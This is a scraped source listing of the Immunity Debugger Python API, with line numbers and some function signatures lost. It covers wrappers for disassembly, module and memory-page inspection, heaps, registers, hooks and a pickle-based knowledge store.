+ 141 ImmDrawColors = { "Black" : 0 , "Maroon" : 128 , "Green" : 32768 , "Olive" : 32896 , "Navy" : 8388608 , "Purple" : 8388736 , "Teal" : 8421376 , \ 142 "Gray" : 8421504 , "Silver" : 12632256 , "Red" : 255 , "Lime" : 65280 , "Yellow" : 65535 , "Blue" : 16711680 , "Fuchsia" : 16711935 , \
+ 143 "Aqua" : 16776960 , "LightGray" : 12632256 , "DarkGray" : 8421504 , "White" : 16777215 , "MoneyGreen" : 12639424 , \
+ 144 "SkyBlue" : 15780518 , "Cream" : 15793151 , "MedGray" : 10789024 , "red" : 255 , "darkgreen" : 32768 }
+ 145
+ 146
+ 147
+ 148
+ 149
+ 150
+
153 """ Initialize the Immunity Debugger API"""
+
154 self . threadid = 0
+
155 os = self . getOsInformation ( )
+
156 self . ossystem = os [ 0 ] . lower ( )
+
157 self . osversion = os [ 1 ] . lower ( )
+
158 self . osrelease = os [ 2 ] . lower ( )
+
159
+
160
+
161 self . isVista = self . getOsRelease ( ) [ 0 ] == '6'
+
162
+
163 self . Eventndx = { debugger . CREATE_PROCESS_DEBUG_EVENT : CreateProcessEvent ,
+
164 debugger . CREATE_THREAD_DEBUG_EVENT : CreateThreadEvent ,
+
165 debugger . EXCEPTION_DEBUG_EVENT : ExceptionEvent ,
+
166 debugger . EXIT_PROCESS_DEBUG_EVENT : ExitProcessEvent ,
+
167 debugger . EXIT_THREAD_DEBUG_EVENT : ExitThreadEvent ,
+
168 debugger . LOAD_DLL_DEBUG_EVENT : LoadDLLEvent ,
+
169 debugger . OUTPUT_DEBUG_STRING_EVENT : OutputDebugEvent ,
+
170 debugger . UNLOAD_DLL_DEBUG_EVENT : UnloadDLLEvent ,
+
171 debugger . RIP_EVENT : RIPEvent }
+
172
+
173 self . clearState ( )
+
174
+
176 self . Symbols = DictTypes ( )
+
177 self . Handles = DictTypes ( )
+
178 self . Threads = DictTypes ( )
+
179 self . MemoryPages = DictTypes ( )
+
180 self . Modules = DictTypes ( )
+
181 self . BackTrace = [ ]
+
182 self . HeapsAddr = [ ]
+
183 self . Heaps = { }
+
184
+
185
+
186
+
188 return self . Error ( "%d" % ( 0x15 * 2 ) )
+
189
+
190
+
191
+
192
+
193
+
195 """
+
196 This function add a python object to the knowledge database.
+
197
+
198 @type id: STRING
+
199 @param id: unique name tag of the object
+
200
+
201 @type object: Python object
+
202 @param object: Object to be saved in the knowledge database
+
203 """
+
204
+
205 pickled_object = pickle . dumps ( object )
+
206 return debugger . AddKnowledge ( pickled_object , id , force_add )
+
207
+
209 """
+
210 Gets python object from the knowledge database.
+
211
+
212 @type id: STRING
+
213 @param id: unique name tag of the object
+
214
+
215 @rtype: PYTHON OBJECT
+
216 @return: Object retrieved from the knowledge database
+
217 """
+
218 pickled_object = debugger . GetKnowledge ( id )
+
219
+
220 if not pickled_object :
+
221 return None
+
222 return pickle . loads ( pickled_object )
+
223
+
225 """
+
226 Gets the list of saved objects in the knowledge database.
+
227
+
228 @rtype: TUPLE
+
229 @return: List of String ids currently saved
+
230 """
+
231 return debugger . ListKnowledge ( )
+
232
+
234 """
+
235 Find possible Packer/Cryptors/etc on a Module
+
236
+
237 @type name: STRING
+
238 @param name: Module name
+
239
+
240 @type OnMemory: (Optional, Def: True) BOOLEAN
+
241 @param OnMemory: Whether to look in memory or on a file.
+
242
+
243 @rtype: LIST of TUPLES in the form of (DWORD, LIST OF STRING)
+
244 @return: A list of the Packer founded (Offset, List of Packer found in that address)
+
245 """
+
246 if OnMemory :
+
247 mem = self . getMemoryPagebyOwner ( name )
+
248 if not mem :
+
249 raise Exception , "Coudln't find a Memory Page belonging to %s" % name
+
250 data = ""
+
251 for a in mem :
+
252 data += a . getMemory ( )
+
253 else :
+
254 mod = self . getModule ( name )
+
255 if not mod :
+
256 raise Exception , "Coudln't find the correct Module belonging to %s" % name
+
257 data = mod . getPath ( )
+
258
+
259 import pefile
+
260 import peutils
+
261 if OnMemory :
+
262 pe = pefile . PE ( data = data )
+
263 else :
+
264 pe = pefile . PE ( name = data )
+
265
+
266 sig_db = peutils . SignatureDatabase ( 'Data/UserDB.TXT' )
+
267 return sig_db . match ( pe )
+
268
+
270 """
+
271 Remove python object from knowledge database.
+
272
+
273 @type id: STRING
+
274 @param id: unique name tag of the object
+
275 """
+
276 return debugger . ForgetKnowledge ( id )
+
277
+
283
+
284
+
286 """
+
287 Add a hook to Immunity Debugger
+
288 """
+
289
+
290 import pickle
+
291 try :
+
292 rtype = object . type
+
293 except :
+
294 rtype = 0
+
295 try :
+
296 label = object . label
+
297 except :
+
298 label = "No Label specified for this hook"
+
299 pickled_object = pickle . dumps ( object )
+
300 debugger . Addhook ( pickled_object , label , rtype )
+
301
+
302
+
304 """
+
305 Clean ID memory from hook objects
+
306 """
+
307 for hk in self . listHooks ( ) :
+
308 debugger . Removehook ( hk )
+
309
+
310
+
311
+
313 """
+
314 Clean ID memory for every kind of object saved in it
+
315 """
+
316 self . cleanHooks ( )
+
317 self . cleanKnowledge ( )
+
318
+
319
+
321 """
+
322 Gets PEB.
+
323 @rtype: DWORD
+
324 @return: PEB address
+
325 """
+
326 return debugger . GetPEB ( )
+
327
+
328
+
329
+
330
+
331
+
333 """
+
334 Analyse module's code
+
335
+
336 @type Address: DWORD
+
337 @param Address: Address from module to be analysed
+
338 """
+
339 debugger . Analysecode ( address )
+
340
+
342 """
+
343 Check if module is already analysed
+
344
+
345 @type Address: DWORD
+
346 @param Address: Address from module
+
347
+
348 @rtype: DWORD
+
349 @return: 1 if module already analysed
+
350 """
+
351 ret = debugger . IsAnalysed ( address )
+
352
+
353 if ret == - 1 :
+
354 return 0
+
355 else :
+
356 return ret
+
357
+
359 """
+
360 Set Variable name to specified address.
+
361
+
362 @type Address: DWORD
+
363 @param Address: Address from assembly line
+
364
+
365 @type String: STRING
+
366 @param String: Variable name to be set
+
367
+
368 """
+
369 return debugger . SetVariable ( address , string )
+
370
+
372 """
+
373 Get Variable name from specified address
+
374
+
375 @type Address: DWORD
+
376 @param Address: Address from assembly line
+
377
+
378 @rtype: STRING
+
379 @return: Variable name for given address.
+
380
+
381 """
+
382 return debugger . GetVariable ( address )
+
383
+
384
+
385
+
387 """
+
388 Disasm address
+
389
+
390 @type Address: DWORD
+
391 @param Address: Address to disasm
+
392
+
393 @type Mode: (Optional, Def: DISASM_ALL)
+
394 @param Mode: Disasm mode
+
395
+
396 @rtype: opCode Object (Check libanalyze.py)
+
397 @return: Disassmbled Opcode
+
398 """
+
399
+
400 op = opCode ( self , address )
+
401 op . _getfromtuple ( debugger . Disasm ( address , mode ) )
+
402 return op
+
403
+
404
+
405
+
407 return self . Disasm ( address , mode )
+
408
+
409
+
410
+
412 """
+
413 Determine command size only
+
414
+
415 @type Address: DWORD
+
416 @param Address: Address to disasm
+
417
+
418 @rtype: opCode Object (Check libanalyze.py)
+
419 @return: Disassmbled Opcode
+
420 """
+
421 return self . Disasm ( address , DISASM_SIZE )
+
422
+
423
+
425 """
+
426 Determine size and analysis data
+
427
+
428 @type Address: DWORD
+
429 @param Address: Address to disasm
+
430
+
431 @rtype: opCode Object (Check libanalyze.py)
+
432 @return: Disassmbled Opcode
+
433 """
+
434 return self . Disasm ( address , DISASM_DATA )
+
435
+
437 """
+
438 Trace integer registers
+
439
+
440 @type Address: DWORD
+
441 @param Address: Address to disasm
+
442
+
443 @rtype: opCode Object (Check libanalyze.py)
+
444 @return: Disassmbled Opcode
+
445 """
+
446 return self . Disasm ( address , DISASM_TRACE )
+
447
+
448
+
450 """
+
451 Disassembly, no symbols/registers
+
452
+
453 @type Address: DWORD
+
454 @param Address: Address to disasm
+
455
+
456 @rtype: opCode Object (Check libanalyze.py)
+
457 @return: Disassmbled Opcode
+
458 """
+
459 return self . Disasm ( address , DISASM_FILE )
+
460
+
461
+
463 """
+
464 Disassembly, registers undefined
+
465
+
466 @type Address: DWORD
+
467 @param Address: Address to disasm
+
468
+
469 @rtype: opCode Object (Check libanalyze.py)
+
470 @return: Disassmbled Opcode
+
471 """
+
472 return self . Disasm ( address , DISASM_CODE )
+
473
+
475 """
+
476 Disassemble with run-trace registers
+
477
+
478 @type Address: DWORD
+
479 @param Address: Address to disasm
+
480
+
481 @rtype: opCode Object (Check libanalyze.py)
+
482 @return: Disassmbled Opcode
+
483 """
+
484 return self . Disasm ( address , DISASM_RTRACE )
+
485
+
486
+
488 """
+
489 Disasm nlines forward of given address
+
490
+
491 @type Address: DWORD
+
492 @param Address: Address to disasm
+
493
+
494 @type nlines: DWORD
+
495 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
496
+
497 @type Mode: (Optional, Def: DISASM_ALL)
+
498 @param Mode: Disasm mode
+
499
+
500 @rtype: opCode Object (Check libanalyze.py)
+
501 @return: Disassmbled Opcode
+
502 """
+
503 forward_address = debugger . Disasmforward ( address , nlines )
+
504 op = opCode ( self , forward_address )
+
505 op . _getfromtuple ( debugger . Disasm ( forward_address , mode ) )
+
506 return op
+
507
+
508
+
509
+
511 """
+
512 Disasm nlines forward to the given address
+
513
+
514 @type Address: DWORD
+
515 @param Address: Address to disasm
+
516
+
517 @type nlines: DWORD
+
518 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
519
+
520 @type Mode: (Optional, Def: DISASM_ALL)
+
521 @param Mode: Disasm mode
+
522
+
523 @rtype: DWORD
+
524 @return: Address of the opcode
+
525 """
+
526 return debugger . Disasmforward ( address , nlines )
+
527
+
529 """
+
530 Determine command size only
+
531
+
532 @type Address: DWORD
+
533 @param Address: Address to disasm
+
534
+
535 @type nlines: DWORD
+
536 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
537
+
538 @rtype: opCode Object (Check libanalyze.py)
+
539 @return: Disassmbled Opcode
+
540 """
+
541 return self . disasmForward ( address , nlines , DISASM_SIZE )
+
542
+
544 """
+
545 Determine size and analysis data
+
546
+
547 @type Address: DWORD
+
548 @param Address: Address to disasm
+
549
+
550 @type nlines: DWORD
+
551 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
552
+
553 @rtype: opCode Object (Check libanalyze.py)
+
554 @return: Disassmbled Opcode
+
555
+
556 """
+
557 return self . disasmForward ( address , nlines , DISASM_DATA )
+
558
+
560 """
+
561 Trace integer registers
+
562
+
563 @type Address: DWORD
+
564 @param Address: Address to disasm
+
565
+
566 @type nlines: DWORD
+
567 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
568
+
569 @rtype: opCode Object (Check libanalyze.py)
+
570 @return: Disassmbled Opcode
+
571 """
+
572 return self . disasmForward ( address , nlines , DISASM_TRACE )
+
573
+
575 """
+
576 Disassembly, no symbols/registers
+
577
+
578 @type Address: DWORD
+
579 @param Address: Address to disasm
+
580
+
581 @type nlines: DWORD
+
582 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
583
+
584 @rtype: opCode Object (Check libanalyze.py)
+
585 @return: Disassmbled Opcode
+
586 """
+
587 return self . disasmForward ( address , nlines , DISASM_FILE )
+
588
+
590 """
+
591 Disassembly, registers undefined
+
592
+
593 @type Address: DWORD
+
594 @param Address: Address to disasm
+
595
+
596 @type nlines: DWORD
+
597 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
598
+
599 @rtype: opCode Object (Check libanalyze.py)
+
600 @return: Disassmbled Opcode
+
601 """
+
602 return self . disasmForward ( address , DISASM_CODE )
+
603
+
605 """
+
606 Disassemble with run-trace registers
+
607
+
608 @type Address: DWORD
+
609 @param Address: Address to disasm
+
610
+
611 @type nlines: DWORD
+
612 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
613
+
614 @rtype: opCode Object (Check libanalyze.py)
+
615 @return: Disassmbled Opcode
+
616 """
+
617 return self . disasmForward ( address , nlines , DISASM_RTRACE )
+
618
+
620 """
+
621 Disasm nlines backward from the given address
+
622
+
623 @type Address: DWORD
+
624 @param Address: Address to disasm
+
625
+
626 @type nlines: DWORD
+
627 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
628
+
629 @rtype: opCode Object (Check libanalyze.py)
+
630 @return: Disassmbled Opcode
+
631 """
+
632 backward_address = debugger . Disasmbackward ( address , nlines )
+
633 op = opCode ( self , backward_address )
+
634 op . _getfromtuple ( debugger . Disasm ( backward_address , mode ) )
+
635 return op
+
636
+
638 """
+
639 Disasm nlines backward of given address
+
640
+
641 @type Address: DWORD
+
642 @param Address: Address to disasm
+
643
+
644 @type nlines: DWORD
+
645 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
646
+
647 @rtype: DWORD
+
648 @return: Address of the Opcode"""
+
649 return debugger . Disasmbackward ( address , nlines )
+
650
+
651
+
652
+
654 """
+
655 Determine command size only
+
656
+
657 @type Address: DWORD
+
658 @param Address: Address to disasm
+
659
+
660 @type nlines: DWORD
+
661 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
662
+
663 @rtype: opCode Object (Check libanalyze.py)
+
664 @return: Disassmbled Opcode
+
665 """
+
666 return self . disasmBackward ( address , nlines , DISASM_SIZE )
+
667
+
669 """
+
670 Determine size and analysis data
+
671
+
672 @type Address: DWORD
+
673 @param Address: Address to disasm
+
674
+
675 @type nlines: DWORD
+
676 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
677
+
678 @rtype: opCode Object (Check libanalyze.py)
+
679 @return: Disassmbled Opcode
+
680 """
+
681 return self . disasmBackward ( address , nlines , DISASM_DATA )
+
682
+
684 """
+
685 Trace integer registers
+
686
+
687 @type Address: DWORD
+
688 @param Address: Address to disasm
+
689
+
690 @type nlines: DWORD
+
691 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
692
+
693 @rtype: opCode Object (Check libanalyze.py)
+
694 @return: Disassmbled Opcode
+
695 """
+
696 return self . disasmBackward ( address , nlines , DISASM_TRACE )
+
697
+
699 """
+
700 Disassembly, no symbols/registers
+
701
+
702 @type Address: DWORD
+
703 @param Address: Address to disasm
+
704
+
705 @type nlines: DWORD
+
706 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
707
+
708 @rtype: opCode Object (Check libanalyze.py)
+
709 @return: Disassmbled Opcode
+
710 """
+
711 return self . disasmBackward ( address , nlines , DISASM_FILE )
+
712
+
714 """
+
715 Disassembly, registers undefined
+
716
+
717 @type Address: DWORD
+
718 @param Address: Address to disasm
+
719
+
720 @type nlines: DWORD
+
721 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
722
+
723 @rtype: opCode Object (Check libanalyze.py)
+
724 @return: Disassmbled Opcode
+
725 """
+
726 return self . disasmBackward ( address , nlines , DISASM_CODE )
+
727
+
729 """
+
730 Disassemble with run-trace registers
+
731
+
732 @type Address: DWORD
+
733 @param Address: Address to disasm
+
734
+
735 @type nlines: DWORD
+
736 @param nlines: (Optional, Def: 1) Number of lines to disassemble forward
+
737
+
738 @rtype: opCode Object (Check libanalyze.py)
+
739 @return: Disassmbled Opcode
+
740 """
+
741 return self . disasmBackward ( address , nlines , DISASM_RTRACE )
+
742
+
744 """
+
745 Get the internal decode information from an analysed module
+
746
+
747 @type Address: DWORD
+
748 @param Address: Address in the range of the module page
+
749
+
750 @rtype: Decode OBJECT
+
751 @return: Decode Object containing the analized information
+
752 """
+
753 return Decode ( address )
+
754
+
755
+
757 """
+
758 Go to next procedure
+
759
+
760 @rtype: DWORD
+
761 @return: Address of next procedure
+
762 """
+
763 return debugger . GoNextProcedure ( )
+
764
+
766 """
+
767 Go to previous procedure
+
768
+
769 @rtype: DWORD
+
770 @return: Address of previous procedure
+
771 """
+
772 return debugger . GoPreviousProcedure ( )
+
773
+
775 """
+
776 Get address's Opcode
+
777
+
778 @type Address: DWORD
+
779 @param Address: Address to disasm
+
780
+
781 @rtype: opCode Object (Check libanalyze.py)
+
782 @return: Disassmbled Opcode
+
783 """
+
784 op = opCode ( self , address )
+
785 op . _getfromtuple ( debugger . Disasm ( address ) )
+
786 return op
+
787
+
788 - def Assemble ( self , code , address = 0x0 ) :
+
789 """
+
790 Assemble code.
+
791
+
792 @type code: STRING
+
793 @param code: Code to be assembled
+
794
+
795 @rtype: STRING
+
796 @return: Opcodes of the assembled code
+
797 """
+
798 opcode = [ ]
+
799 for line in code . split ( "\n" ) :
+
800 line = line . strip ( )
+
801 if line :
+
802 opcode . append ( debugger . Assemble ( line , address ) )
+
803 return string . joinfields ( opcode , "" )
+
804
+
806 """
+
807 Decode given address
+
808
+
809 @rtype: STRING
+
810 @return: decoded value
+
811 """
+
812 return debugger . DecodeAddress ( address )
+
813
+
815 """
+
816 Undecorate given name
+
817
+
818 @type decorated: STRING
+
819 @param decorated: decorated name
+
820 @rtype: STRING
+
821 @return: undecorated name
+
822 """
+
823 return debugger . UndecorateName ( decorated )
+
824
+
825 - def getTraceArgs ( self , address , tracedarg , shownonusersupplied = False ) :
+
826 """
+
827 Trace Parameters of a function, return only when is user-supplied
+
828
+
829 @type Address: DWORD
+
830 @param Address: Address of the function call
+
831
+
832 @type Tracedarg: DWORD
+
833 @param Tracedarg: Parameter to trace
+
834
+
835 @type Shownonusersupplied: BOOLEAN
+
836 @param Shownonusersupplied: (Optional, Def: False) Flag whether or not show user supplied param
+
837
+
838 @rtype: TUPLES
+
839 @return: Returns a tuple of (Push Opcode, TABLE of OPCODES setting the PUSH)
+
840 """
+
841 t = TraceArgs ( self , address , tracedarg , shownonusersupplied )
+
842 return t . get ( )
+
843
+
845 """
+
846 Gets all function of given module's address
+
847
+
848 @rtype: LIST
+
849 @return: Function start address
+
850 """
+
851 return debugger . Getallfunctions ( address )
+
852
+
854 """
+
855 Get the Function information
+
856
+
857 @type Address: DWORD
+
858 @param Address: Address of the function
+
859
+
860 @rtype: Function Object
+
861 @return: Function Object containing information of the requested function
+
862
+
863 """
+
864 return Function ( self , address )
+
865
+
867 """
+
868 Find start address of funcion
+
869
+
870 @rtype: DWORD
+
871 @return: Start Address"""
+
872 return debugger . Getfuncbegin ( address )
+
873
+
875 """
+
876 Get all the possible ends of a Function
+
877
+
878 @type function_address: DWORD
+
879 @param function_address: Address of the function
+
880
+
881 @rtype: LIST
+
882 @return: List of Address of all the possible ret address
+
883 """
+
884 if type ( function_address ) in ( type ( 1 ) , type ( 1L ) ) :
+
885 func = self . getFunction ( function_address )
+
886 return func . getFunctionEnd ( )
+
887 elif isinstance ( function_address , Function ) :
+
888 return function_address . getFunctionEnd ( )
+
889 else :
+
890 raise Exception , "Function type not recognized"
+
891
+
892
+
893
+
894
+
895
+
896
+
897
+
898
+
899
+
900
+
902 """
+
903 Gets all basic blocks of given procedure (Deprecated, use Function)
+
904
+
905 @rtype: LIST
+
906 @return: (start,end) addresses of basic blocks
+
907 """
+
908 bblocks = debugger . Getallbasicblocks ( address )
+
909 basicblocks = [ ]
+
910 if bblocks :
+
911 for block in bblocks :
+
912 basicblocks . append ( basicBlock ( self , block [ 0 ] , block [ 1 ] ) )
+
913 return basicblocks
+
914
+
916 """
+
917 Find data references to given address
+
918
+
919 @rtype: LIST
+
920 @return: Table with found references
+
921 """
+
922 return debugger . FindDataRef ( address )
+
923
+
925 """
+
926 Get X Reference from a given address
+
927
+
928 @type Address: DWORD
+
929 @param Address: Address
+
930
+
931 @rtype: LIST
+
932 @return: List of X reference from the given address
+
933 """
+
934 for mod in self . getAllModules ( ) :
+
935 xref = mod . getXrefFrom ( address )
+
936
+
937 if xref : return xref
+
938 return [ ]
+
939
+
941 """
+
942 Get X Reference to a given address
+
943
+
944 @type Address: DWORD
+
945 @param Address: Address
+
946
+
947 @rtype: LIST
+
948 @return: List of X reference to the given address
+
949 """
+
950 for mod in self . getAllModules ( ) :
+
951 xref = mod . getXrefTo ( address )
+
952
+
953 if xref : return xref
+
954 return [ ]
+
955
+
957 """
+
958 Get intermodular calls
+
959
+
960 @type Address: DWORD
+
961 @param Address: Address
+
962
+
963 @rtype: DICTIONARY
+
964 @return: Dict of intermodular calls to the given address
+
965 """
+
966 self . gotoDisasmWindow ( address )
+
967 return debugger . GetInterCalls ( address )
+
968
+
969
+
970
+
971
+
972
+
974 """
+
975 Get CPU Context values.
+
976
+
977 @rtype: DICTIONARY
+
978 @return: x86 Registers
+
979 """
+
980 return debugger . Getregs ( )
+
981
+
983 """
+
984 We have to do this to handle the Long integers, which XML-RPC cannot do
+
985
+
986 @rtype: DICTIONARY
+
987 @return: x86 registers in string format (repr)
+
988 """
+
989 regs = self . getRegs ( )
+
990
+
991 for r in regs :
+
992 regs [ r ] = repr ( regs [ r ] )
+
993 return regs
+
994
+
995 - def setReg ( self , reg , value ) :
+
996 """
+
997 Set REG value
+
998
+
999 @type reg: STRING
+
1000 @param reg: Register name
+
1001
+
1002 @type value: DWORD
+
1003 @param vale: Value to set the register
+
1004 """
+
1005 return debugger . Setreg ( Register [ reg ] , value )
+
1006
+
1008 """
+
1009 Get the PEB information of the debugged process
+
1010
+
1011 @rtype: PEB OBJECT
+
1012 @return: PEB """
+
1013
+
1014 return PEB ( self )
+
1015
+
1016
+
1017 - def getHeap ( self , addr , restore = False ) :
+
1018 """
+
1019 Get Heap Information
+
1020
+
1021 @type addr: DWORD
+
1022 @param addr: Address of the heap
+
1023
+
1024 @type restore: BOOLEAN
+
1025 @param restore: (Optional, Def: False) Flag whether or not use a restore heap
+
1026
+
1027 @rtype: PHeap OBJECT
+
1028 @return: Heap
+
1029 """
+
1030 if self . Heaps . has_key ( addr ) :
+
1031 return self . Heaps [ addr ]
+
1032
+
1033 if self . isVista :
+
1034 pheap = libheap . VistaPHeap ( self , addr , restore )
+
1035 else :
+
1036 pheap = libheap . PHeap ( self , addr , restore )
+
1037
+
1038 if pheap :
+
1039 self . Heaps [ addr ] = pheap
+
1040 return pheap
+
1041
+
1043 """
+
1044 Get debugged name
+
1045
+
1046 @rtype: STRING
+
1047 @return: Name of the Process been debugged
+
1048 """
+
1049 return debugger . getDebuggedName ( )
+
1050
+
1052 """
+
1053 Get debugged pid
+
1054
+
1055 @rtype: DWORD
+
1056 @return: Process ID
+
1057 """
+
1058 return debugger . getPID ( )
+
1059
+
1061 """
+
1062 Is debugger running as admin?
+
1063 @rtype: INTEGER
+
1064 @return: 1 if running as admin
+
1065 """
+
1066 return debugger . IsAdmin ( )
+
1067
+
1069 """
+
1070 Get information displayed on Info Panel
+
1071
+
1072 @rtype: TUPLE
+
1073 @return: Python Tuple with the 3 lines from InfoPanel
+
1074 """
+
1075 return debugger . Getinfopanel ( )
+
1076
+
1078 """
+
1079 Get the current address been focus on the Disasm window
+
1080
+
1081 @rtype: DWORD
+
1082 @return: Address
+
1083 """
+
1084 return debugger . GetCurrentAddress ( )
+
1085
+
1086
+
1088 """
+
1089 Get all loaded modules.
+
1090
+
1091 @rtype: DICTIONARY
+
1092 @return: Dict of Modules
+
1093 """
+
1094
+
1095 if self . Modules :
+
1096 return self . Modules
+
1097
+
1098 modulos = debugger . Getallmodules ( )
+
1099 symbol = 1
+
1100 for mod in modulos . keys ( ) :
+
1101 if not self . Modules . has_key ( mod ) :
+
1102
+
1103 m = Module ( mod , modulos [ mod ] [ 0 ] , modulos [ mod ] [ 1 ] , modulos [ mod ] [ 2 ] )
+
1104 mod_dict = self . _getmoduleinfo ( modulos [ mod ] [ 0 ] )
+
1105 m . setModuleExtension ( mod_dict )
+
1106 if symbol :
+
1107 self . getAllSymbols ( )
+
1108 symbol = 0
+
1109
+
1110 try :
+
1111 m . setSymbols ( self . Symbols [ mod . lower ( ) ] )
+
1112 except KeyError :
+
1113 pass
+
1114 self . Modules [ mod ] = m
+
1115
+
1116
+
1117
+
1118 return self . Modules
+
1119
+
1121
+
1122 modulos = debugger . Getallmodules ( )
+
1123
+
1124 for name in modulos . keys ( ) :
+
1125 total_range = modulos [ name ] [ 0 ] + modulos [ name ] [ 1 ]
+
1126 if address > modulos [ name ] [ 0 ] and address < total_range :
+
1127 if not self . Modules . has_key ( name ) :
+
1128 m = Module ( name , modulos [ name ] [ 0 ] , modulos [ name ] [ 1 ] , modulos [ name ] [ 2 ] )
+
1129 mod_dict = self . _getmoduleinfo ( modulos [ name ] [ 0 ] )
+
1130 m . setModuleExtension ( mod_dict )
+
1131 self . Modules [ name ] = m
+
1132 return m
+
1133 else :
+
1134 return self . Modules [ name ]
+
1135
+
1137 """
+
1138 Get Module Information
+
1139
+
1140 @type name: STRING
+
1141 @param name: Name of the module
+
1142
+
1143 @rtype: Module OBJECT
+
1144 @return: A Module object
+
1145 """
+
1146
+
1147
+
1148
+
1149 modulos = debugger . Getallmodules ( )
+
1150 if modulos . has_key ( name ) :
+
1151 if not self . Modules . has_key ( name ) :
+
1152
+
1153 m = Module ( name , modulos [ name ] [ 0 ] , modulos [ name ] [ 1 ] , modulos [ name ] [ 2 ] )
+
1154 mod_dict = self . _getmoduleinfo ( modulos [ name ] [ 0 ] )
+
1155 m . setModuleExtension ( mod_dict )
+
1156
+
1157
+
1158
+
1159
+
1160
+
1161
+
1162
+
1163
+
1164 self . Modules [ name ] = m
+
1165 return m
+
1166 else :
+
1167 return self . Modules [ name ]
+
1168
+
1169
+
1170
+
1171
+
1172
+
1173
+
1174
+
1175
+
1176
+
1177
+
1178 return None
+
1179
+
1181 return debugger . Getmodinfo ( base_address )
+
1182
+
1184 """
+
1185 Get all referenced string from module
+
1186
+
1187 @type name: DWORD
+
1188 @param name: Code Base Address
+
1189 @rtype: LIST
+
1190 @return: A list of tuples with referenced strings (address, string, comment)
+
1191 """
+
1192 return debugger . Getreferencedstrings ( code_base )
+
1193
+
1195 """
+
1196 List all active processes.
+
1197
+
1198 @rtype: LIST
+
1199 @return: A list of tuples with process information (pid, name, path, services, tcp list, udp list)
+
1200 """
+
1201 return debugger . ps ( )
+
1202
+
1204 """
+
1205 List all active processes.
+
1206
+
1207 @rtype: LIST
+
1208 @return: A list of tuples with process information (pid, name, path, services, tcp list, udp list)
+
1209 """
+
1210 return self . Ps ( )
+
1211
+
1213 """
+
1214 Get the SEH chain.
+
1215
+
1216 @rtype: LIST
+
1217 @return: A list of tuples with SEH information (seh, handler)
+
1218 """
+
1219 return debugger . Getsehchain ( )
+
1220
+
1222 """
+
1223 Get the current Event
+
1224
+
1225 @rtype: Event Object
+
1226 @return: Event
+
1227 """
+
1228 event = debugger . Getevent ( )
+
1229 EventCode = event [ 0 ] [ 0 ]
+
1230 try :
+
1231 return self . Eventndx [ EventCode ] ( event )
+
1232 except KeyError :
+
1233 return None
+
1234
+
1235 - def getPage ( self , addr ) :
+
1236 """
+
1237 Get a memory page.
+
1238
+
1239 @type addr: DWORD
+
1240 @param addr: Address of a beginning of the Page
+
1241
+
1242 @rtype: Page OBJECT
+
1243 @return: Memory Page
+
1244 """
+
1245 self . getMemoryPages ( )
+
1246 try :
+
1247 return self . MemoryPages [ addr ]
+
1248 except KeyError :
+
1249 return None
+
1250
+
1251 - def getMemoryPagebyOwner ( self , owner ) :
+
1252 """
+
1253 Get the Memory Pages belonging to the given dll.
+
1254
+
1255 @type owner: STRING
+
1256 @param owner: Name of the dll
+
1257
+
1258 @rtype: LIST
+
1259 @return: LIST of Memory Pages belonging to the given dll
+
1260 """
+
1261 self . getMemoryPages ( )
+
1262
+
1263 pages = [ ]
+
1264 for a in self . MemoryPages . keys ( ) :
+
1265 mem = self . MemoryPages [ a ]
+
1266 if mem . getOwner ( ) == owner :
+
1267 pages . append ( mem )
+
1268
+
1269 return pages
+
1270
+
1271 - def getMemoryPagebyOwnerAddress ( self , owner_addr ) :
+
1272 """
+
1273 Get the Memory Pages belonging to the given dll by its base address.
+
1274
+
1275 @type owner: STRING
+
1276 @param owner: Name of the dll
+
1277
+
1278 @rtype: LIST
+
1279 @return: LIST of Memory Pages belonging to the given dll
+
1280 """
+
1281 self . getMemoryPages ( )
+
1282
+
1283 pages = [ ]
+
1284 for a in self . MemoryPages . keys ( ) :
+
1285 mem = self . MemoryPages [ a ]
+
1286 if mem . owner == owner_addr :
+
1287 pages . append ( mem )
+
1288
+
1289 return pages
+
1290
+
1291 - def getMemoryPagebyAddress ( self , address ) :
+
1292 """
+
1293 Get a memory page.
+
1294
+
1295 @type address: DWORD
+
1296 @param address: Address in the range of the Page
+
1297
+
1298 @rtype: Page OBJECT
+
1299 @return: Memory Page
+
1300 """
+
1301
+
1302 self . getMemoryPages ( )
+
1303 for a in self . MemoryPages . keys ( ) :
+
1304 mem = self . MemoryPages [ a ]
+
1305 if mem . baseaddress <= address and ( mem . getBaseAddress ( ) + mem . size ) > address :
+
1306 return mem
+
1307 return None
+
1308
+
1309 - def getMemoryPages ( self ) :
+
1310 """
+
1311 Get All memory pages.
+
1312
+
1313 @rtype: DICTIONARY
+
1314 @return: List of all memory pages
+
1315 """
+
1316 if self . MemoryPages :
+
1317 return self . MemoryPages
+
1318
+
1319 pages = debugger . Getmemorypages ( )
+
1320
+
1321 for addr in pages . keys ( ) :
+
1322 m = MemoryPage ( addr , self )
+
1323 m . _getfromtuple ( pages [ addr ] )
+
1324 self . MemoryPages [ addr ] = m
+
1325 return self . MemoryPages
+
1326
+
1328 """
+
1329 Query Memory Page
+
1330
+
1331 @type address: DWORD
+
1332 @param address: Base Address of memory page
+
1333
+
1334 @rtype: Python List
+
1335 @return: List with memory page structure
+
1336 """
+
1337 return debugger . VmQuery ( address )
+
1338
+
1339
+
1341 """
+
1342 Get all handles.
+
1343
+
1344 @rtype: DICTIONARY
+
1345 @return: All the process handles
+
1346 """
+
1347 if self . Handles :
+
1348 return self . Handles
+
1349
+
1350 handles = debugger . Getallhandles ( )
+
1351 for h in handles . keys ( ) :
+
1352 H = Handle ( h )
+
1353 H . _getfromtuple ( handles [ h ] )
+
1354 self . Handles [ h ] = H
+
1355 return self . Handles
+
1356
+
1358 """
+
1359 Get all threads.
+
1360 @rtype: LIST
+
